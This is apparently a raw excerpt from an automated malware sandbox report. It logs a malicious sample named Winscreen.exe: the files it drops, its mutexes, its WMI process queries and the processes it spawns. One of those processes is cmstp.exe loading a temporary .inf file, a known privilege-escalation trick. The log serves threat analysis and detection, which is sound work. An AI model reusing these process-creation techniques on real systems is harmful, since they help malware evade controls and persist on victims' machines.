                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBE37933_2_02CBE379
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBA8CB33_2_02CBA8CB
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBA8D833_2_02CBA8D8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CB9C9833_2_02CB9C98
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBE8B433_2_02CBE8B4
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBB05033_2_02CBB050
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBAC7033_2_02CBAC70
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBB9F833_2_02CBB9F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBA1F033_2_02CBA1F0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CB119833_2_02CB1198
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02CBBD3B33_2_02CBBD3B
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB28D833_2_02EB28D8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBECB033_2_02EBECB0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB243033_2_02EB2430
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB5DA033_2_02EB5DA0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBD6E033_2_02EBD6E0
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB12F633_2_02EB12F6
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBD6D133_2_02EBD6D1
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB9E8933_2_02EB9E89
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB9A6033_2_02EB9A60
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB9A5133_2_02EB9A51
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBEA3F33_2_02EBEA3F
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBA63033_2_02EBA630
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB920833_2_02EB9208
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBA61F33_2_02EBA61F
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBE3E833_2_02EBE3E8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB7B9133_2_02EB7B91
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB732833_2_02EB7328
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB770133_2_02EB7701
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB771033_2_02EB7710
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB1CE833_2_02EB1CE8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB28CB33_2_02EB28CB
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB88B133_2_02EB88B1
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBEC9F33_2_02EBEC9F
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB91F833_2_02EB91F8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB19C833_2_02EB19C8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB19D833_2_02EB19D8
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB5D9033_2_02EB5D90
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB819033_2_02EB8190
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBAD4833_2_02EBAD48
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBCD4033_2_02EBCD40
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EB213833_2_02EB2138
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBE13833_2_02EBE138
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeCode function: 33_2_02EBCD3033_2_02EBCD30
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC11F2034_2_00007FF6FDC11F20
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC1CE8834_2_00007FF6FDC1CE88
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBF5E2434_2_00007FF6FDBF5E24
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBFF93034_2_00007FF6FDBFF930
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0492834_2_00007FF6FDC04928
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC2075434_2_00007FF6FDC20754
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC1B19034_2_00007FF6FDC1B190
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC1348434_2_00007FF6FDC13484
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0A4AC34_2_00007FF6FDC0A4AC
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0AF1834_2_00007FF6FDC0AF18
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC2075434_2_00007FF6FDC20754
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC18DF434_2_00007FF6FDC18DF4
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC12D5834_2_00007FF6FDC12D58
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC3208034_2_00007FF6FDC32080
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC35AF834_2_00007FF6FDC35AF8
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC2FA9434_2_00007FF6FDC2FA94
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBF1AA434_2_00007FF6FDBF1AA4
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC12AB034_2_00007FF6FDC12AB0
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC01A4834_2_00007FF6FDC01A48
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC289A034_2_00007FF6FDC289A0
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0C96C34_2_00007FF6FDC0C96C
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC1396434_2_00007FF6FDC13964
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC28C1C34_2_00007FF6FDC28C1C
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0BB9034_2_00007FF6FDC0BB90
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC14B9834_2_00007FF6FDC14B98
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC05B6034_2_00007FF6FDC05B60
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBF76C034_2_00007FF6FDBF76C0
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC3255034_2_00007FF6FDC32550
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBF484034_2_00007FF6FDBF4840
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC2C83834_2_00007FF6FDC2C838
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBFA31034_2_00007FF6FDBFA310
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBFC2F034_2_00007FF6FDBFC2F0
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBF728834_2_00007FF6FDBF7288
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0126C34_2_00007FF6FDC0126C
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC121D034_2_00007FF6FDC121D0
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0F18034_2_00007FF6FDC0F180
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC0B53434_2_00007FF6FDC0B534
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC153F034_2_00007FF6FDC153F0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2C23D35_2_00007FF848F2C23D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F30A6035_2_00007FF848F30A60
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3926535_2_00007FF848F39265
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2226B35_2_00007FF848F2226B
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F20AD835_2_00007FF848F20AD8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F23AEA35_2_00007FF848F23AEA
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2649A35_2_00007FF848F2649A
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2B30D35_2_00007FF848F2B30D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2036D35_2_00007FF848F2036D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F23E4435_2_00007FF848F23E44
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2065335_2_00007FF848F20653
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2069535_2_00007FF848F20695
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2D5B235_2_00007FF848F2D5B2
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3481035_2_00007FF848F34810
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3501D35_2_00007FF848F3501D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3AF4035_2_00007FF848F3AF40
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2778635_2_00007FF848F27786
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2479A35_2_00007FF848F2479A
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F207F035_2_00007FF848F207F0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2EFF035_2_00007FF848F2EFF0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3EA4935_2_00007FF848F3EA49
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3EA6035_2_00007FF848F3EA60
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F372B535_2_00007FF848F372B5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2B0FD35_2_00007FF848F2B0FD
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2D10035_2_00007FF848F2D100
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2B94035_2_00007FF848F2B940
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2815C35_2_00007FF848F2815C
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3DBFD35_2_00007FF848F3DBFD
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2EC1035_2_00007FF848F2EC10
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F33C1035_2_00007FF848F33C10
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F43C2535_2_00007FF848F43C25
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2B46535_2_00007FF848F2B465
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F34C9835_2_00007FF848F34C98
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F20CF535_2_00007FF848F20CF5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F4367535_2_00007FF848F43675
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2067D35_2_00007FF848F2067D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F206A535_2_00007FF848F206A5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F42D3335_2_00007FF848F42D33
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2BDB535_2_00007FF848F2BDB5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2BDD035_2_00007FF848F2BDD0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3480A35_2_00007FF848F3480A
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F4784935_2_00007FF848F47849
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F2D0E935_2_00007FF848F2D0E9
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3AF2135_2_00007FF848F3AF21
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F42F9935_2_00007FF848F42F99
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F39FB935_2_00007FF848F39FB9
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F207C035_2_00007FF848F207C0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F39FD035_2_00007FF848F39FD0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 35_2_00007FF848F3B7D035_2_00007FF848F3B7D0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F403FD37_2_00007FF848F403FD
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4C23D37_2_00007FF848F4C23D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4065337_2_00007FF848F40653
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F50A6037_2_00007FF848F50A60
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4069537_2_00007FF848F40695
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F40AD837_2_00007FF848F40AD8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4B30D37_2_00007FF848F4B30D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4D5B237_2_00007FF848F4D5B2
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4E9C837_2_00007FF848F4E9C8
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4EFF037_2_00007FF848F4EFF0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4EC1037_2_00007FF848F4EC10
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F53C1037_2_00007FF848F53C10
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F43E4437_2_00007FF848F43E44
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4B46537_2_00007FF848F4B465
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F5EA6037_2_00007FF848F5EA60
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4067D37_2_00007FF848F4067D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4649A37_2_00007FF848F4649A
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F406A537_2_00007FF848F406A5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4D0E937_2_00007FF848F4D0E9
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F40CF537_2_00007FF848F40CF5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4B0FD37_2_00007FF848F4B0FD
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4D10037_2_00007FF848F4D100
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4B94037_2_00007FF848F4B940
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4815C37_2_00007FF848F4815C
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F40D5837_2_00007FF848F40D58
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4777F37_2_00007FF848F4777F
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4479A37_2_00007FF848F4479A
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4BDB537_2_00007FF848F4BDB5
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4BDD037_2_00007FF848F4BDD0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F4E9D037_2_00007FF848F4E9D0
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeCode function: 37_2_00007FF848F407F037_2_00007FF848F407F0
                        Source: Winscreen.exeStatic PE information: No import functions for PE file found
                        Source: Winscreen.exe, 00000000.00000002.2401079826.000000001D5D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametaskmen.exeb! vs Winscreen.exe
                        Source: Winscreen.exe, 00000000.00000002.2365052335.0000000004A4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenametaskmen.exeb! vs Winscreen.exe
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xtm5g4p2.inf
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\05mor1jc.inf
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xtm5g4p2.infJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\System32\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\05mor1jc.inf
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: Commandline size = 4619
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeProcess created: Commandline size = 4619
                        Source: wscript.exe, 0000003B.00000003.2816122505.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000003B.00000003.2822535327.0000000002AE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000003B.00000003.2864238945.0000000002AE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
                        Source: classification engineClassification label: mal100.spre.bank.adwa.spyw.expl.evad.mine.winEXE@102/183@6/4
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDBFB6D8 GetLastError,FormatMessageW,LocalFree,34_2_00007FF6FDBFB6D8
                        Source: C:\Windows\Client.exeCode function: 34_2_00007FF6FDC18624 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,34_2_00007FF6FDC18624
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeFile created: C:\Program Files (x86)\win.dll
                        Source: C:\Users\user\Desktop\Winscreen.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6104:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_03
                        Source: C:\Users\user\Desktop\Winscreen.exeMutant created: \Sessions\1\BaseNamedObjects\XvsL7sezE3uExhGfq
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeMutant created: \Sessions\1\BaseNamedObjects\t8vIzvYtJOEef2Kp
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_03
                        Source: C:\Windows\System32\cmstp.exeMutant created: \Sessions\1\BaseNamedObjects\Connection Manager Profile Installer Mutex
                        Source: C:\Users\user\Desktop\Winscreen.exeFile created: C:\Users\user\AppData\Local\Temp\taskmen.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Windows\fail.bat"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\winlog.vbs"
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\explorer.exe
                        Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Windows\explorer.exe
                        Source: C:\Users\user\Desktop\Winscreen.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exeJump to behavior
                        Source: C:\Windows\SysWOW64\userinit.exeProcess created: C:\Windows\explorer.exe
                        Source: Winscreen.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.65%
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmstp.exe")
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmstp.exe")
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
